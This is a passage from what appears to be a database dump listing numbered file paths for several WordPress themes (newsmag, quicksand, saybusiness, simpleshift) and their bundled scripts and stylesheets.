/inc/customizer/epsilon-framework/control-epsilon-upsell.php'),(4366,'wp-content/themes/newsmag/inc/customizer/register_settings.php'),(4367,'wp-content/themes/newsmag/inc/customizer/settings/banners/controls.php'),(4368,'wp-content/themes/newsmag/inc/customizer/settings/banners/sections.php'),(4369,'wp-content/themes/newsmag/inc/customizer/settings/banners/settings.php'),(4370,'wp-content/themes/newsmag/inc/customizer/settings/general/controls.php'),(4371,'wp-content/themes/newsmag/inc/customizer/settings/general/panels.php'),(4372,'wp-content/themes/newsmag/inc/customizer/settings/general/sections.php'),(4373,'wp-content/themes/newsmag/inc/customizer/settings/general/settings.php'),(4374,'wp-content/themes/newsmag/inc/customizer.php'),(4375,'wp-content/themes/newsmag/inc/enqueues.php'),(4376,'wp-content/themes/newsmag/inc/extras.php'),(4377,'wp-content/themes/newsmag/inc/jetpack.php'),(4378,'wp-content/themes/newsmag/inc/notify-system-checks.php'),(4379,'wp-content/themes/newsmag/inc/sidebars.php'),(4380,'wp-content/themes/newsmag/inc/template-tags.php'),(4381,'wp-content/themes/newsmag/inc/theme-setup.php'),(4382,'wp-content/themes/newsmag/inc/widgets/homepage_slider/class-widget-newsmag-homepage_slider.php'),(4383,'wp-content/themes/newsmag/inc/widgets/homepage_slider/layouts/slider.php'),(4384,'wp-content/themes/newsmag/inc/widgets/popularposts/class-widget-newsmag-popularposts.php'),(4385,'wp-content/themes/newsmag/inc/widgets/posts_column/class-widget-newsmag-posts_column.php'),(4386,'wp-content/themes/newsmag/inc/widgets/posts_column/layouts/posts_column.php'),(4387,'wp-content/themes/newsmag/inc/widgets/posts_column/layouts/posts_column_featured.php'),(4388,'wp-content/themes/newsmag/inc/widgets/posts_grid/class-widget-newsmag-posts_grid.php'),(4389,'wp-content/themes/newsmag/inc/widgets/posts_grid/layouts/posts_grid.php'),(4390,'wp-content/themes/newsmag/inc/widgets/posts_list_horizontal/class-widget-newsmag-posts_list_horizontal.php'),(4391,'wp-content/themes/newsmag/inc/widgets/posts_list_horizontal/layouts/posts_list_horizontal.php'),(4392,'wp-content/themes/newsmag/inc/widgets/posts_list_vertical/class-widget-newsmag-posts_list_vertical.php'),(4393,'wp-content/themes/newsmag/inc/widgets/posts_list_vertical/layouts/posts_list_vertical.php'),(4394,'wp-content/themes/newsmag/inc/widgets.php'),(4395,'wp-content/themes/newsmag/index.php'),(4396,'wp-content/themes/newsmag/package.json'),(4397,'wp-content/themes/newsmag/page.php'),(4398,'wp-content/themes/newsmag/readme.txt'),(4399,'wp-content/themes/newsmag/screenshot.jpg'),(4400,'wp-content/themes/newsmag/search.php'),(4401,'wp-content/themes/newsmag/sidebar-footer.php'),(4402,'wp-content/themes/newsmag/sidebar.php'),(4403,'wp-content/themes/newsmag/single.php'),(4404,'wp-content/themes/newsmag/style.css'),(4405,'wp-content/themes/newsmag/template-parts/after-footer.php'),(4406,'wp-content/themes/newsmag/template-parts/author-info.php'),(4407,'wp-content/themes/newsmag/template-parts/banner/banner-adsense.php'),(4408,'wp-content/themes/newsmag/template-parts/banner/banner-image.php'),(4409,'wp-content/themes/newsmag/template-parts/content-none.php'),(4410,'wp-content/themes/newsmag/template-parts/content-page.php'),(4411,'wp-content/themes/newsmag/template-parts/content-search.php'),(4412,'wp-content/themes/newsmag/template-parts/content-single.php'),(4413,'wp-content/themes/newsmag/template-parts/content.php'),(4414,'wp-content/themes/newsmag/template-parts/social.php'),(4415,'wp-content/themes/quicksand/404.php'),(4416,'wp-content/themes/quicksand/archive.php'),(4417,'wp-content/themes/quicksand/comments.php'),(4418,'wp-content/themes/quicksand/css/custom-editor-style.css'),(4419,'wp-content/themes/quicksand/css/font-awesome.css'),(4420,'wp-content/themes/quicksand/css/font-awesome.min.css'),(4421,'wp-content/themes/quicksand/css/quicksand-ganymede-elegy.css'),(4422,'wp-content/themes/quicksand/css/quicksand-ganymede-elegy.min.css'),(4423,'wp-content/themes/quicksand/css/quicksand-jupiter-jazz.css'),(4424,'wp-content/themes/quicksand/css/quicksand-jupiter-jazz.min.css'),(4425,'wp-content/themes/quicksand/css/quicksand.css'),(4426,'wp-content/themes/quicksand/css/quicksand.min.css'),(4427,'wp-content/themes/quicksand/footer.php'),(4428,'wp-content/themes/quicksand/functions.php'),(4429,'wp-content/themes/quicksand/header.php'),(4430,'wp-content/themes/quicksand/image.php'),(4431,'wp-content/themes/quicksand/inc/QuicksandNavwalker.php'),(4432,'wp-content/themes/quicksand/inc/back-compat.php'),(4433,'wp-content/themes/quicksand/inc/class.QuicksandCustomizeCategoryControl.php'),(4434,'wp-content/themes/quicksand/inc/class.QuicksandCustomizeControlCheckboxMultiple.php'),(4435,'wp-content/themes/quicksand/inc/color-schemes.php'),(4436,'wp-content/themes/quicksand/inc/customize-css.php'),(4437,'wp-content/themes/quicksand/inc/customizer.php'),(4438,'wp-content/themes/quicksand/inc/template-tags.php'),(4439,'wp-content/themes/quicksand/inc/widgets/class.QuicksandWidgetArchives.php'),(4440,'wp-content/themes/quicksand/inc/widgets/class.QuicksandWidgetCategories.php'),(4441,'wp-content/themes/quicksand/index.php'),(4442,'wp-content/themes/quicksand/js/bootstrap.js'),(4443,'wp-content/themes/quicksand/js/bootstrap.min.js'),(4444,'wp-content/themes/quicksand/js/color-scheme-control.js'),(4445,'wp-content/themes/quicksand/js/customize-multiple-checkboxes.js'),(4446,'wp-content/themes/quicksand/js/customize-preview.js'),(4447,'wp-content/themes/quicksand/js/fitvids.js'),(4448,'wp-content/themes/quicksand/js/fitvids.min.js'),(4449,'wp-content/themes/quicksand/js/flexslider/flexslider.css'),(4450,'wp-content/themes/quicksand/js/flexslider/images/bg_play_pause.png'),(4451,'wp-content/themes/quicksand/js/flexslider/jquery.flexslider-min.js'),(4452,'wp-content/themes/quicksand/js/flexslider/jquery.flexslider.js'),(4453,'wp-content/themes/quicksand/js/lg-thumbnail.js'),(4454,'wp-content/themes/quicksand/js/lg-thumbnail.min.js'),(4455,'wp-content/themes/quicksand/js/lightgallery/css/lg-fb-comment-box.css'),(4456,'wp-content/themes/quicksand/js/lightgallery/css/lg-fb-comment-box.min.css'),(4457,'wp-content/themes/quicksand/js/lightgallery/css/lg-transitions.css'),(4458,'wp-content/themes/quicksand/js/lightgallery/css/lg-transitions.min.css'),(4459,'wp-content/themes/quicksand/js/lightgallery/css/lightgallery.css'),(4460,'wp-content/themes/quicksand/js/lightgallery/css/lightgallery.min.css'),(4461,'wp-content/themes/quicksand/js/lightgallery/img/loading.gif'),(4462,'wp-content/themes/quicksand/js/lightgallery/img/video-play.png'),(4463,'wp-content/themes/quicksand/js/lightgallery/img/vimeo-play.png'),(4464,'wp-content/themes/quicksand/js/lightgallery/img/youtube-play.png'),(4465,'wp-content/themes/quicksand/js/lightgallery/js/lightgallery-all.js'),(4466,'wp-content/themes/quicksand/js/lightgallery/js/lightgallery-all.min.js'),(4467,'wp-content/themes/quicksand/js/lightgallery/js/lightgallery.js'),(4468,'wp-content/themes/quicksand/js/lightgallery/js/lightgallery.min.js'),(4469,'wp-content/themes/quicksand/js/quicksand.js'),(4470,'wp-content/themes/quicksand/js/tether.js'),(4471,'wp-content/themes/quicksand/js/tether.min.js'),(4472,'wp-content/themes/quicksand/page.php'),(4473,'wp-content/themes/quicksand/readme.txt'),(4474,'wp-content/themes/quicksand/screenshot.png'),(4475,'wp-content/themes/quicksand/search.php'),(4476,'wp-content/themes/quicksand/searchform.php'),(4477,'wp-content/themes/quicksand/sidebar-content-left.php'),(4478,'wp-content/themes/quicksand/sidebar-content-right.php'),(4479,'wp-content/themes/quicksand/single.php'),(4480,'wp-content/themes/quicksand/style.css'),(4481,'wp-content/themes/quicksand/template-fullwidth.php'),(4482,'wp-content/themes/quicksand/template-parts/biography.php'),(4483,'wp-content/themes/quicksand/template-parts/content-audio.php'),(4484,'wp-content/themes/quicksand/template-parts/content-gallery.php'),(4485,'wp-content/themes/quicksand/template-parts/content-link.php'),(4486,'wp-content/themes/quicksand/template-parts/content-none.php'),(4487,'wp-content/themes/quicksand/template-parts/content-page-full.php'),(4488,'wp-content/themes/quicksand/template-parts/content-page.php'),(4489,'wp-content/themes/quicksand/template-parts/content-quote.php'),(4490,'wp-content/themes/quicksand/template-parts/content-search.php'),(4491,'wp-content/themes/quicksand/template-parts/content-video.php'),(4492,'wp-content/themes/quicksand/template-parts/content.php'),(4493,'wp-content/themes/quicksand/template-parts/navigation-primary.php'),(4494,'wp-content/themes/quicksand/template-parts/slider.php'),(4495,'wp-content/themes/saybusiness/404.php'),(4496,'wp-content/themes/saybusiness/archive.php'),(4497,'wp-content/themes/saybusiness/comments.php'),(4498,'wp-content/themes/saybusiness/css/bootstrap.css'),(4499,'wp-content/themes/saybusiness/css/bootstrap.css.map'),(4500,'wp-content/themes/saybusiness/css/editor-style.css'),(4501,'wp-content/themes/saybusiness/css/ie.css'),(4502,'wp-content/themes/saybusiness/css/ie7.css'),(4503,'wp-content/themes/saybusiness/css/ie8.css'),(4504,'wp-content/themes/saybusiness/css/lightbox.css'),(4505,'wp-content/themes/saybusiness/css/theme-manager.css'),(4506,'wp-content/themes/saybusiness/footer.php'),(4507,'wp-content/themes/saybusiness/front-page.php'),(4508,'wp-content/themes/saybusiness/functions.php'),(4509,'wp-content/themes/saybusiness/header.php'),(4510,'wp-content/themes/saybusiness/home.php'),(4511,'wp-content/themes/saybusiness/image.php'),(4512,'wp-content/themes/saybusiness/inc/back-compat.php'),(4513,'wp-content/themes/saybusiness/inc/breadcrumbs.php'),(4514,'wp-content/themes/saybusiness/inc/customizer-slider.php'),(4515,'wp-content/themes/saybusiness/inc/customizer.php'),(4516,'wp-content/themes/saybusiness/inc/page-template.php'),(4517,'wp-content/themes/saybusiness/inc/slider.php'),(4518,'wp-content/themes/saybusiness/inc/template-tags.php'),(4519,'wp-content/themes/saybusiness/inc/theme-manager.php'),(4520,'wp-content/themes/saybusiness/inc/upsell/class-customize.php'),(4521,'wp-content/themes/saybusiness/inc/upsell/customize-controls.css'),(4522,'wp-content/themes/saybusiness/inc/upsell/customize-controls.js'),(4523,'wp-content/themes/saybusiness/inc/upsell/section-pro.php'),(4524,'wp-content/themes/saybusiness/inc/woo-functions.php'),(4525,'wp-content/themes/saybusiness/index.php'),(4526,'wp-content/themes/saybusiness/js/bootstrap.js'),(4527,'wp-content/themes/saybusiness/js/custom.js'),(4528,'wp-content/themes/saybusiness/js/customize-preview.js'),(4529,'wp-content/themes/saybusiness/js/html5.js'),(4530,'wp-content/themes/saybusiness/js/isotope.js'),(4531,'wp-content/themes/saybusiness/js/keyboard-image-navigation.js'),(4532,'wp-content/themes/saybusiness/js/lightbox.js'),(4533,'wp-content/themes/saybusiness/js/owl-carousel.js'),(4534,'wp-content/themes/saybusiness/js/stellar.js'),(4535,'wp-content/themes/saybusiness/page.php'),(4536,'wp-content/themes/saybusiness/readme.txt'),(4537,'wp-content/themes/saybusiness/screenshot.png'),(4538,'wp-content/themes/saybusiness/search.php'),(4539,'wp-content/themes/saybusiness/searchform.php'),(4540,'wp-content/themes/saybusiness/sidebar-shop.php'),(4541,'wp-content/themes/saybusiness/sidebar.php'),(4542,'wp-content/themes/saybusiness/single.php'),(4543,'wp-content/themes/saybusiness/style.css'),(4544,'wp-content/themes/saybusiness/template-parts/biography.php'),(4545,'wp-content/themes/saybusiness/template-parts/contact-page.php'),(4546,'wp-content/themes/saybusiness/template-parts/content-loop.php'),(4547,'wp-content/themes/saybusiness/template-parts/content-none.php'),(4548,'wp-content/themes/saybusiness/template-parts/content-page.php'),(4549,'wp-content/themes/saybusiness/template-parts/content-search.php'),(4550,'wp-content/themes/saybusiness/template-parts/content-single.php'),(4551,'wp-content/themes/saybusiness/template-parts/grid-posts.php'),(4552,'wp-content/themes/saybusiness/template-parts/page-full-width.php'),(4553,'wp-content/themes/saybusiness/template-parts/page-with-both-sidebars.php'),(4554,'wp-content/themes/saybusiness/template-parts/page-with-left-sidebar.php'),(4555,'wp-content/themes/saybusiness/template-parts/page-with-right-sidebar.php'),(4556,'wp-content/themes/simpleshift/404.php'),(4557,'wp-content/themes/simpleshift/assets/css/bootstrap.css'),(4558,'wp-content/themes/simpleshift/assets/css/bootstrap.min.css'),(4559,'wp-content/themes/simpleshift/assets/css/font-awesome.css'),(4560,'wp-content/themes/simpleshift/assets/css/font-awesome.min.css'),(4561,'wp-content/themes/simpleshift/assets/images/glyphicons-halflings-white.png'),(4562,'wp-content/themes/simpleshift/assets/images/glyphicons-halflings.png'),(4563,'wp-content/themes/simpleshift/assets/images/preview/184x184-1.jpg'),(4564,'wp-content/themes/simpleshift/assets/images/preview/184x184-2.jpg'),(4565,'wp-content/themes/simpleshift/assets/images/preview/184x184-3.jpg'),(4566,'wp-content/themes/simpleshift/assets/images/preview/184x184-6.jpg'),(4567,'wp-content/themes/simpleshift/assets/images/preview/boat.jpg'),(4568,'wp-content/themes/simpleshift/assets/images/preview/deer.jpg'),(4569,'wp-content/themes/simpleshift/assets/images/preview/hills.jpg'),(4570,'wp-content/themes/simpleshift/assets/images/preview/purplebridge.jpg'),(4571,'wp-content/themes/simpleshift/assets/images/preview/road.jpg'),(4572,'wp-content/themes/simpleshift/assets/images/search_icon.png'),(4573,'wp-content/themes/simpleshift/assets/js/bootstrap.js'),(4574,'wp-content/themes/simpleshift/assets/js/bootstrap.min.js'),(4575,'wp-content/themes/simpleshift/assets/js/html5shiv.js'),(4576,'wp-content/themes/simpleshift/assets/js/html5shiv.min.js'),(4577,'wp-content/themes/simpleshift/assets/js/jquery.easing.js'),(4578,'wp-content/themes/simpleshift/assets/js/jquery.easing.min.js'),(4579,'wp-content/themes/simpleshift/assets/js/jquery.waypoints.js'),(4580,'wp-content/themes/simpleshift/assets/js/jquery.waypoints.min.js'),(4581,'wp-content/themes/simpleshift/assets/js/nicescroll.js'),(4582,'wp-content/themes/simpleshift/assets/js/nicescroll.min.js'),(4583,'wp-content/themes/simpleshift/assets/js/parallax.js'),(4584,'wp-content/themes/simpleshift/assets/js/parallax.min.js'),(4585,'wp-content/themes/simpleshift/assets/js/public.js'),(4586,'wp-content/themes/simpleshift/assets/js/respond.js'),(4587,'wp-content/themes/simpleshift/assets/js/respond.min.js'),(4588,'wp-content/themes/simpleshift/assets/js/scrollReveal.js'),(4589,'wp-content/themes/simpleshift/assets/js/scrollReveal.min.js'),(4590,'wp-content/themes/simpleshift/assets/js/sticky.js'),(4591,'wp-content/themes/simpleshift/assets/js/sticky.min.js'),(4592,'wp-content/themes/simpleshift/changelog.txt'),(4593,'wp-content/themes/simpleshift/comments.php'),(4594,'wp-content/themes/simpleshift/footer.php'),(4595,'wp-content/themes/simpleshift/functions.php'),(4596,'wp-content/themes/simpleshift/header.php'),(4597,'wp-content/themes/simpleshift/inc/kirki/LICENSE'),(4598,'wp-content/themes/simpleshift/inc/kirki/assets/css/customizer-dynamic-css-colors.php'),(4599,'wp-content/themes/simpleshift/inc/kirki/assets/css/customizer-dynamic-css-width.php'),(4600,'wp-content/themes/simpleshift/inc/kirki/assets/css/customizer-dynamic-css.php'),(4601,'wp-content/themes/simpleshift/inc/kirki/assets/css/customizer.css'),(4602,'wp-content/themes/simpleshift/inc/kirki/assets/css/customizer.css.map'),(4603,'wp-content/themes/simpleshift/inc/kirki/assets/css/customizer.min.css'),(4604,'wp-content/themes/simpleshift/inc/kirki/assets/css/hint.css'),(4605,'wp-content/themes/simpleshift/inc/kirki/assets/css/kirki-styles.css'),(4606,'wp-content/themes/simpleshift/inc/kirki/assets/css/select2.min.css'),(4607,'wp-content/themes/simpleshift/inc/kirki/assets/css/transparency-grid.png'),(4608,'wp-content/themes/simpleshift/inc/kirki/assets/images/1c.png'),(4609,'wp-content/themes/simpleshift/inc/kirki/assets/images/2cl.png'),(4610,'wp-content/themes/simpleshift/inc/kirki/assets/images/2cr.png'),(4611,'wp-content/themes/simpleshift/inc/kirki/assets/images/3cl.png'),(4612,'wp-content/themes/simpleshift/inc/kirki/assets/images/3cm.png'),(4613,'wp-content/themes/simpleshift/inc/kirki/assets/images/3cr.png'),(4614,'wp-content/themes/simpleshift/inc/kirki/assets/images/jquery.fs.stepper-arrows.png'),(4615,'wp-content/themes/simpleshift/inc/kirki/assets/images/kirki-bottom.png'),(4616,'wp-content/themes/simpleshift/inc/kirki/assets/images/kirki-bottom.svg'),(4617,'wp-content/themes/simpleshift/inc/kirki/assets/images/kirki-logo.svg'),(4618,'wp-content/themes/simpleshift/inc/kirki/assets/images/kirki-toolkit.png'),(4619,'wp-content/themes/simpleshift/inc/kirki/assets/js/branding.js'),(4620,'wp-content/themes/simpleshift/inc/kirki/assets/js/controls/checkbox.js'),(4621,'wp-content/themes/simpleshift/inc/kirki/assets/js/controls/code.js'),(4622,'wp-content/themes/simpleshift/inc/kirki/assets/js/controls/color-alpha.js'),(4623,'wp-content/themes/simpleshift/inc/kirki/assets/js/controls/color-palette.js'),(4624,'wp-content/themes/simpleshift/inc/kirki/assets/js/controls/color.js'),(4625,'wp-content/themes/simpleshift/inc/kirki/assets/js/controls/custom.js'),(4626,'wp-content/themes/simpleshift/inc/kirki/assets/js/controls/dashicons.js'),(4627,'wp-content/themes/simpleshift/inc/kirki/assets/js/controls/date.js'),(4628,'wp-content/themes/simpleshift/inc/kirki/assets/js/controls/datetime.js'),(4629,'wp-content/themes/simpleshift/inc/kirki/assets/js/controls/dimension.js'),(4630,'wp-content/themes/simpleshift/inc/kirki/assets/js/controls/dropdown-pages.js'),(4631,'wp-content/themes/simpleshift/inc/kirki/assets/js/controls/editor.js'),(4632,'wp-content/themes/simpleshift/inc/kirki/assets/js/controls/generic.js'),(4633,'wp-content/themes/simpleshift/inc/kirki/assets/js/controls/multicheck.js'),(4634,'wp-content/themes/simpleshift/inc/kirki/assets/js/controls/multicolor.js'),(4635,'wp-content/themes/simpleshift/inc/kirki/assets/js/controls/number.js'),(4636,'wp-content/themes/simpleshift/inc/kirki/assets/js/controls/palette.js'),(4637,'wp-content/themes/simpleshift/inc/kirki/assets/js/controls/preset.js'),(4638,'wp-content/themes/simpleshift/inc/kirki/assets/js/controls/radio-buttonset.js'),(4639,'wp-content/themes/simpleshift/inc/kirki/assets/js/controls/radio-image.js'),(4640,'wp-content/themes/simpleshift/inc/kirki/assets/js/controls/radio.js'),(4641,'wp-content/themes/simpleshift/inc/kirki/assets/js/controls/repeater.js'),(4642,'wp-content/themes/simpleshift/inc/kirki/assets/js/controls/select.js'),(4643,'wp-content/themes/simpleshift/inc/kirki/assets/js/controls/slider.js'),(4644,'wp-content/themes/simpleshift/inc/kirki/assets/js/controls/sortable.js'),(4645,'wp-content/themes/simpleshift/inc/kirki/assets/js/controls/spacing.js'),(4646,'wp-content/themes/simpleshift/inc/kirki/assets/js/controls/switch.js'),(4647,'wp-content/themes/simpleshift/inc/kirki/assets/js/controls/toggle.js'),(4648,'wp-content/themes/simpleshift/inc/kirki/assets/js/controls/typography.js'),(4649,'wp-content/themes/simpleshift/inc/kirki/assets/js/customizer.js'),(4650,'wp-content/themes/simpleshift/inc/kirki/assets/js/customizer.min.js'),(4651,'wp-content/themes/simpleshift/inc/kirki/assets/js/customizer.min.js.map'),(4652,'wp-content/themes/simpleshift/inc/kirki/assets/js/functions/set-setting-value.js'),(4653,'wp-content/themes/simpleshift/inc/kirki/assets/js/functions/validate-css-value.js'),(4654,'wp-content/themes/simpleshift/inc/kirki/assets/js/kirki-branding.js'),(4655,'wp-content/themes/simpleshift/inc/kirki/assets/js/kirki-functions.js'),(4656,'wp-content/themes/simpleshift/inc/kirki/assets/js/kirki-postmessage.js'),(4657,'wp-content/themes/simpleshift/inc/kirki/assets/js/kirki-tooltip.js'),(4658,'wp-content/themes/simpleshift/inc/kirki/assets/js/l10n.js'),(4659,'wp-content/themes/simpleshift/inc/kirki/assets/js/postmessage.js'),(4660,'wp-content/themes/simpleshift/inc/kirki/assets/js/reset.js'),(4661,'wp-content/themes/simpleshift/inc/kirki/assets/js/tooltip.js'),(4662,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/AUTHORS'),(4663,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/LICENSE'),(4664,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/README.md'),(4665,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/comment/comment.js'),(4666,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/comment/continuecomment.js'),(4667,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/dialog/dialog.css'),(4668,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/dialog/dialog.js'),(4669,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/display/autorefresh.js'),(4670,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/display/fullscreen.css'),(4671,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/display/fullscreen.js'),(4672,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/display/panel.js'),(4673,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/display/placeholder.js'),(4674,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/display/rulers.js'),(4675,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/edit/closebrackets.js'),(4676,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/edit/closetag.js'),(4677,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/edit/continuelist.js'),(4678,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/edit/matchbrackets.js'),(4679,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/edit/matchtags.js'),(4680,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/edit/trailingspace.js'),(4681,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/fold/brace-fold.js'),(4682,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/fold/comment-fold.js'),(4683,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/fold/foldcode.js'),(4684,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/fold/foldgutter.css'),(4685,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/fold/foldgutter.js'),(4686,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/fold/indent-fold.js'),(4687,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/fold/markdown-fold.js'),(4688,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/fold/xml-fold.js'),(4689,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/hint/anyword-hint.js'),(4690,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/hint/css-hint.js'),(4691,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/hint/html-hint.js'),(4692,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/hint/javascript-hint.js'),(4693,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/hint/show-hint.css'),(4694,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/hint/show-hint.js'),(4695,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/hint/sql-hint.js'),(4696,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/hint/xml-hint.js'),(4697,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/lint/coffeescript-lint.js'),(4698,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/lint/css-lint.js'),(4699,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/lint/html-lint.js'),(4700,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/lint/javascript-lint.js'),(4701,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/lint/json-lint.js'),(4702,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/lint/lint.css'),(4703,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/lint/lint.js'),(4704,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/lint/yaml-lint.js'),(4705,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/merge/merge.css'),(4706,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/merge/merge.js'),(4707,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/mode/loadmode.js'),(4708,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/mode/multiplex.js'),(4709,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/mode/multiplex_test.js'),(4710,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/mode/overlay.js'),(4711,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/mode/simple.js'),(4712,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/runmode/colorize.js'),(4713,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/runmode/runmode-standalone.js'),(4714,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/runmode/runmode.js'),(4715,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/runmode/runmode.node.js'),(4716,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/scroll/annotatescrollbar.js'),(4717,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/scroll/scrollpastend.js'),(4718,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/scroll/simplescrollbars.css'),(4719,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/scroll/simplescrollbars.js'),(4720,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/search/match-highlighter.js'),(4721,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/search/matchesonscrollbar.css'),(4722,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/search/matchesonscrollbar.js'),(4723,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/search/search.js'),(4724,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/search/searchcursor.js'),(4725,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/selection/active-line.js'),(4726,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/selection/mark-selection.js'),(4727,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/selection/selection-pointer.js'),(4728,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/tern/tern.css'),(4729,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/tern/tern.js'),(4730,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/tern/worker.js'),(4731,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/wrap/hardwrap.js'),(4732,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/bin/authors.sh'),(4733,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/bin/compress'),(4734,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/bin/lint'),(4735,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/bin/release'),(4736,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/bin/source-highlight'),(4737,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/keymap/emacs.js'),(4738,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/keymap/sublime.js'),(4739,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/keymap/vim.js'),(4740,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/lib/codemirror.css'),(4741,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/lib/codemirror.js'),(4742,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/coffeescript/coffeescript.js'),(4743,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/coffeescript/index.html'),(4744,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/css/css.js'),(4745,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/css/gss.html'),(4746,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/css/gss_test.js'),(4747,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/css/index.html'),(4748,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/css/less.html'),(4749,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/css/less_test.js'),(4750,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/css/scss.html'),(4751,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/css/scss_test.js'),(4752,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/css/test.js'),(4753,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/haml/haml.js'),(4754,'wp-content/themes/simpleshift/inc/kirki/assets/js/